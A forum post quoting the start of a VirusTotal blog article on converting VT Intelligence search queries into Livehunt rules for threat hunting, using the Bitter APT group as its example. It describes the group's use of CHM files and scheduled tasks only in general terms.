The path from VT Intelligence queries to VT Livehunt rules: A CTI analyst approach
#1
Information 
Quote: 
[Image: Logo_VT_Horizontal.png]

This post will explain the process you can follow to create a VT Livehunt rule from a VT Intelligence query. Something typical in threat hunting and threat intelligence operations.Let’s assume that, as a threat hunter, you created robust VT intelligence (VTI) queries getting you reliable results without false positives.

Your queries are so good that you run them daily to obtain fresh new samples, which is a tedious job to do manually (pro tip - you can automate using the API).A good alternative would be converting your VTI query into a LiveHunt rule, so you will be immediately notified every time any uploaded indicator matches your criteria. Unfortunately, there is not an automated way to convert intelligence queries into LiveHunt rules (and vice versa), and in some cases it is not even possible to obtain exactly the same results (technical tldr - due to limitations of the stored data structure).But do not despair. In this post we are going to show many practical cases showing LiveHunt rules based on VT intelligence queries, how you can do it yourself, and pros, cons and limitations for this approach.

The perfect query ̶d̶o̶e̶s̶n̶’̶t̶ exist

Bitter APT

Bitter APT is a suspected South Asian cyber espionage threat group. Security researchers like StopMalvertisin, among others, regularly publish information about this actor in both X and VirusTotal community.

To start hunting for files related to Bitter APT, you probably want to subscribe to any attributed VirusTotal collection or the threat actor profile itself.


https://www.virustotal.com/gui/file/1ea9.../community

https://www.virustotal.com/gui/threat-ac...summaryYou can also search for what the community is discussing about this APT directly by searching on community comments. For example, the next query returns samples related to Bitter APT.

entity:file comment:"Bitter APT"

When checking these samples’ behavior we can find interesting patterns that can be used to hunt for other similar ones. For instance, Bitter seems to specially like the "chm" file format, as seen in the initial Twitter/X reference and when calculating Commonalities among these files, along with the use of scheduled tasks to achieve persistence on targeted systems, and run the %comspec% environment variable through the scheduled task created to execute msiexec.exe followed by an URL.
...
Continue Reading
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:





[-]
Recent Posts
Intel to release another microcode upda...
Intel confirms 13th/...harlan4096 — 09:12
Adobe will disable Adobe Elements 2025 t...
Adobe announced ne...harlan4096 — 09:11
iOS 18.0.1 fixes iPhone touch screen pro...
Apple has released...harlan4096 — 09:09
K-Lite Codec Pack 18.5.5 / 18.5.7 Update
Changes in 18.5.7:...harlan4096 — 09:32
AdGuard Browser Extension 5.0.128
AdGuard Browser Ex...harlan4096 — 09:31

[-]
Birthdays
Today's Birthdays
avatar (47)Konradsuiz
avatar (37)haupeadvoge
avatar (41)RobertBrura
Upcoming Birthdays
avatar (46)Michaelaceve
avatar (36)QuadirLigh
avatar (37)Mblippek
avatar (40)guerigGep
avatar (43)viecontAceve
avatar (48)wohnkwagVib
avatar (43)Michaelsen
avatar (36)armaMIZ
avatar (47)lambrnag
avatar (48)AlbertDig
avatar (48)beipHit
avatar (44)Wendigortup
avatar (37)Timothynet
avatar (40)MichaelHig
avatar (36)icebywiwy
avatar (44)Cameronreoxy
avatar (40)BrendaRusia
avatar (46)maggiebz16
avatar (37)MarthaWes
avatar (46)vikgoMam
avatar (39)Michaelcrini
avatar (37)DonaldSoM

[-]
Online Staff
There are no staff members currently online.

>